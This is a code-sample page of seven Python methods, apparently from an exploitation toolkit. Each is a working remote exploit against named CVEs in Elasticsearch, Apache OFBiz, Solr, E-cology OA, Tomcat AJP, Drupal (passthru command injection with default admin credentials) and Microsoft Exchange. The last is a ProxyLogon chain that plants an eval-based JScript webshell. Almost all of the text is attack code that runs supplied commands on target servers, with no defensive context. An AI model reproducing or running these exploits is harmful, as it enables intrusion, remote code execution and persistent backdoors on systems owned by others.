Exemple #1
0
 def cve_2015_1427_exp(self, cmd):
     vul_name = "Elasticsearch: CVE-2015-1427"
     self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
     self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
     self.host = self.hostname + ":" + str(self.port)
     self.headers_text = {
         'Host': "" + self.host,
         'Accept': '*/*',
         'Connection': 'close',
         'Accept-Language': 'en',
         'User-Agent': self.ua,
         'Content-Type': 'application/text'
     }
     try:
         self.request = requests.post(self.url + "/website/blog/",
                                      data=self.data_send_info,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
         self.req = requests.post(self.url + "/_search?pretty",
                                  data=self.data_rce,
                                  headers=self.headers_text,
                                  timeout=self.timeout,
                                  verify=False)
         try:
             self.r = list(json.loads(
                 self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
         except IndexError:
             self.r = "null"
         raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
         verify.exploit_print(self.r, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception as e:
         verify.error_print(vul_name)
Exemple #2
0
    def cve_2021_30128_exp(self, cmd):
        vul_name = "Apache OFBiz: CVE-2021-30128"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': 'text/xml',
            'Connection': 'close'
        }

        def _trans(s):
            return "%s" % ''.join('%.2x' % x for x in s)

        try:
            dns_data = bytes(cmd, encoding="utf8")
            dns_hex = _trans(dns_data)
            #print(cmd)
            #print(dns_hex)

            data = self.payload_cve_2021_30128_exp.replace(
                "RECOMMAND", dns_hex)
            url = urljoin(self.url, "/webtools/control/SOAPService")
            #print(data)
            request = requests.post(url,
                                    data=data,
                                    headers=headers,
                                    timeout=self.timeout,
                                    verify=False)
            if request.status_code == 200:
                r = "Command Executed Successfully (But No Echo)"
            else:
                r = "Command Executed Failed... ..."
            verify.exploit_print(r, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception as e:
            verify.error_print(vul_name)
Exemple #3
0
 def cve_2019_17558_exp(self, cmd):
     vul_name = "Apache Solr: CVE-2019-17558"
     core_name = None
     payload_2 = self.payload_cve_2019_17558.replace("RECOMMAND", cmd)
     url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
     try:
         request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
         try:
             core_name = list(json.loads(request.text)["status"])[0]
         except AttributeError:
             pass
         url_api = self.url + "/solr/" + str(core_name) + "/config"
         headers_json = {'Content-Type': 'application/json', 'User-Agent': self.ua}
         set_api_data = """
         {
           "update-queryresponsewriter": {
             "startup": "lazy",
             "name": "velocity",
             "class": "solr.VelocityResponseWriter",
             "template.base.dir": "",
             "solr.resource.loader.enabled": "true",
             "params.resource.loader.enabled": "true"
           }
         }
         """
         request = requests.post(url_api, data=set_api_data, headers=headers_json, timeout=self.timeout, verify=False)
         request = requests.get(self.url + "/solr/" + str(core_name) + payload_2, headers=self.headers,
                                timeout=self.timeout, verify=False)
         raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Exemple #4
0
 def time_2021_0515_exp(self, cmd):
     vul_name = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
     url = urljoin(self.url, "/services%20/WorkflowServiceXml")
     headers = {
         'User-Agent': self.ua,
         'SOAPAction': '""',
         'cmd': cmd,
         "Content-Type": "text/xml;charset=UTF-8"
     }
     data = self.payload_time_2021_0515
     try:
         request = requests.post(url,
                                 data=data,
                                 headers=headers,
                                 timeout=self.timeout,
                                 verify=False)
         self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
         verify.exploit_print(request.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Exemple #5
0
 def cve_2020_1938_exp(self, file):
     vul_name = "Apache Shiro: CVE-2016-4437"
     headers = self.headers
     self.output_method = "ajp"
     self.default_port = self.port
     self.default_requri = '/'
     self.default_headers = {}
     self.username = None
     self.password = None
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.request = "null"
     raw_data = ">_< Tomcat cve-2020-2019 vulnerability uses AJP protocol detection\n" \
                ">_< So there is no HTTP protocol request and response"
     try:
         socket.setdefaulttimeout(self.timeout)
         self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
         self.socket.connect((self.hostname, self.default_port))
         self.stream = self.socket.makefile("rb",
                                            buffering=0)  # PY2: bufsize=0
         self.attributes = [
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.request_uri', '/']
             },
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.path_info', file]
             },
             {
                 'name': 'req_attribute',
                 'value': ['javax.servlet.include.servlet_path', '/']
             },
         ]
         method = 'GET'
         self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
             self,
             self.hostname,
             self.default_requri,
             method=AjpForwardRequest.REQUEST_METHODS.get(method))
         if self.username is not None and self.password is not None:
             self.forward_request.request_headers[
                 'SC_REQ_AUTHORIZATION'] = "Basic " + str(
                     ("%s:%s" % (self.username, self.password)
                      ).encode('base64').replace("\n"
                                                 ""))
         for h in self.default_headers:
             self.forward_request.request_headers[h] = headers[h]
         for a in self.attributes:
             self.forward_request.attributes.append(a)
         self.responses = self.forward_request.send_and_receive(
             self.socket, self.stream)
         if len(self.responses) == 0:
             return None, None
         self.snd_hdrs_res = self.responses[0]
         self.data_res = self.responses[1:-1]
         self.request = (b"".join([d.data for d in self.data_res]).decode())
         verify.exploit_print(self.request, raw_data)
     except socket.timeout:
         verify.timeout_print(vul_name)
     except Exception as error:
         verify.error_print(vul_name)
Exemple #6
0
 def cve_2018_7602_exp(self, cmd):
     vul_name = "Drupal: CVE-2018-7602"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
         verify.exploit_print(self.r.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)
Exemple #7
0
    def cve_2021_27065_exp(self, cmd, file, email):
        vul_name = "Microsoft Exchange: CVE-2021-27065"
        FILE_PATH = 'C:\\inetpub\\wwwroot\\aspnet_client\\' + file
        FILE_DATA = '<script language="JScript" runat="server">function Page_Load(){eval(Request["v"],"unsafe");}</script>'

        def __unpack_str(byte_string):
            return byte_string.decode('UTF-8').replace('\x00', '')

        def __unpack_int(format, data):
            return unpack(format, data)[0]

        def __exploit(url, name, path, qs='', data='', cookies=[], headers={}):

            cookies = list(cookies)
            cookies.extend([
                'X-BEResource=a]@%s:444%s?%s#~1941962753' % (name, path, qs),
            ])
            if not headers:
                headers = {'Content-Type': 'application/json'}

            headers['Cookie'] = ';'.join(cookies)
            headers['msExchLogonMailbox'] = 'S-1-5-20'
            try:
                r = requests.post(url + "/ecp/y.js",
                                  headers=headers,
                                  data=data,
                                  verify=False,
                                  allow_redirects=False)
                return r
            except:
                return False

        def _get_sid(url, name, mail):
            payload = '''
        <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
            <Request>
              <EMailAddress>%s</EMailAddress>
              <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
            </Request>
        </Autodiscover>
        ''' % mail
            headers = {
                'User-Agent': 'ExchangeServicesClient/0.0.0.0',
                'Content-Type': 'text/xml'
            }
            r = __exploit(url,
                          name,
                          '/autodiscover/autodiscover.xml',
                          qs='',
                          data=payload,
                          headers=headers)
            res = re.search('<LegacyDN>(.*?)</LegacyDN>', r.text)
            if res:
                headers = {
                    'X-Clientapplication': 'Outlook/15.0.4815.1002',
                    'X-Requestid': 'x',
                    'X-Requesttype': 'Connect',
                    'Content-Type': 'application/mapi-http',
                }
                legacyDN = res.group(1)
                payload = legacyDN + '\x00\x00\x00\x00\x00\x20\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00'
                r = __exploit(url,
                              name,
                              '/mapi/emsmdb/',
                              qs='',
                              data=payload,
                              headers=headers)
                res = re.search('with SID ([S\-0-9]+) ', r.text)
                if res:
                    return res.group(1)
                else:
                    return False
            else:
                return False

        def _parse_challenge(auth):
            target_info_field = auth[40:48]
            target_info_len = __unpack_int('H', target_info_field[0:2])
            target_info_offset = __unpack_int('I', target_info_field[4:8])

            target_info_bytes = auth[target_info_offset:target_info_offset +
                                     target_info_len]

            domain_name = ''
            computer_name = ''
            info_offset = 0
            while info_offset < len(target_info_bytes):
                av_id = __unpack_int(
                    'H', target_info_bytes[info_offset:info_offset + 2])
                av_len = __unpack_int(
                    'H', target_info_bytes[info_offset + 2:info_offset + 4])
                av_value = target_info_bytes[info_offset + 4:info_offset + 4 +
                                             av_len]

                info_offset = info_offset + 4 + av_len
                if av_id == 2:  # MsvAvDnsDomainName
                    domain_name = __unpack_str(av_value)
                elif av_id == 3:  # MsvAvDnsComputerName
                    computer_name = __unpack_str(av_value)
            return domain_name, computer_name

        def _get_email(url):
            try:
                url = get_fld(url)
                return url
            except:
                return "unkonw"

        try:
            MAIL = email
            print('[+] Test Email =', MAIL)
            # Getting ComputerName and DomainName
            url = self.url + "/rpc/"
            ntlm_type1 = "TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKALpHAAAADw=="
            headers = {'Authorization': 'Negotiate %s' % ntlm_type1}
            r = requests.get(url,
                             headers=headers,
                             timeout=self.timeout,
                             verify=False)
            assert r.status_code == 401, "Error while getting ComputerName"
            auth_header = r.headers['WWW-Authenticate']
            auth = re.search('Negotiate ([A-Za-z0-9/+=]+)',
                             auth_header).group(1)
            domain_name, computer_name = _parse_challenge(b64decode(auth))
            print('[*] Domain Name   =', domain_name)
            print('[*] Computer Name =', computer_name)
            NAME = computer_name
            # get SID
            sid = _get_sid(self.url, NAME, MAIL)
            print('[*] Login sid =', sid)
            payload = '<r at="NTLM" ln="%s"><s t="0">%s</s></r>' % (
                MAIL.split('@')[0], sid)
            r = __exploit(self.url,
                          NAME,
                          '/ecp/proxyLogon.ecp',
                          qs='',
                          data=payload)
            session_id = r.cookies.get('ASP.NET_SessionId')
            canary = r.cookies.get('msExchEcpCanary')
            print('[*] get ASP.NET_SessionId =', session_id)
            print('[*] get msExchEcpCanary   =', canary)
            try:
                extra_cookies = [
                    'ASP.NET_SessionId=' + session_id,
                    'msExchEcpCanary=' + canary
                ]
            except:
                extra_cookies = [
                    'ASP.NET_SessionId=' + str(session_id),
                    'msExchEcpCanary=' + str(canary)
                ]
            # Getting OAB information
            qs = urlencode({
                'schema': 'OABVirtualDirectory',
                'msExchEcpCanary': canary
            })
            r = __exploit(self.url,
                          NAME,
                          '/ecp/DDI/DDIService.svc/GetObject',
                          qs=qs,
                          data='',
                          cookies=extra_cookies)
            try:
                identity = r.json()['d']['Output'][0]['Identity']
                print('[*] OAB Name', identity['DisplayName'])
                print('[*] OAB ID  ', identity['RawIdentity'])
            except:
                identity = False
            print('[*] Setting up webshell payload through OAB')
            qs = urlencode({
                'schema': 'OABVirtualDirectory',
                'msExchEcpCanary': canary
            })
            payload = json.dumps({
                'identity': {
                    '__type': 'Identity:ECP',
                    'DisplayName': identity['DisplayName'],
                    'RawIdentity': identity['RawIdentity']
                },
                'properties': {
                    'Parameters': {
                        '__type':
                        'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                        'ExternalUrl': 'http://f/' + FILE_DATA
                    }
                }
            })
            r = __exploit(self.url,
                          NAME,
                          '/ecp/DDI/DDIService.svc/SetObject',
                          qs=qs,
                          data=payload,
                          cookies=extra_cookies)
            if r.status_code == 200:
                print('[*] Writing shell')
                qs = urlencode({
                    'schema': 'ResetOABVirtualDirectory',
                    'msExchEcpCanary': canary
                })
                payload = json.dumps({
                    'identity': {
                        '__type': 'Identity:ECP',
                        'DisplayName': identity['DisplayName'],
                        'RawIdentity': identity['RawIdentity']
                    },
                    'properties': {
                        'Parameters': {
                            '__type':
                            'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                            'FilePathName': FILE_PATH
                        }
                    }
                })
                r = __exploit(self.url,
                              NAME,
                              '/ecp/DDI/DDIService.svc/SetObject',
                              qs=qs,
                              data=payload,
                              cookies=extra_cookies)

                # Set-OABVirtualDirectory
                print('[*] Cleaning OAB')
                qs = urlencode({
                    'schema': 'OABVirtualDirectory',
                    'msExchEcpCanary': canary
                })
                payload = json.dumps({
                    'identity': {
                        '__type': 'Identity:ECP',
                        'DisplayName': identity['DisplayName'],
                        'RawIdentity': identity['RawIdentity']
                    },
                    'properties': {
                        'Parameters': {
                            '__type':
                            'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',
                            'ExternalUrl': ''
                        }
                    }
                })
                r = __exploit(self.url,
                              NAME,
                              '/ecp/DDI/DDIService.svc/SetObject',
                              qs=qs,
                              data=payload,
                              cookies=extra_cookies)
            up = '[+] upload webshell is ' + self.url + "/aspnet_client/" + file
            self.raw_data = dump.dump_all(r).decode('utf-8', 'ignore')
            verify.exploit_print(up, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)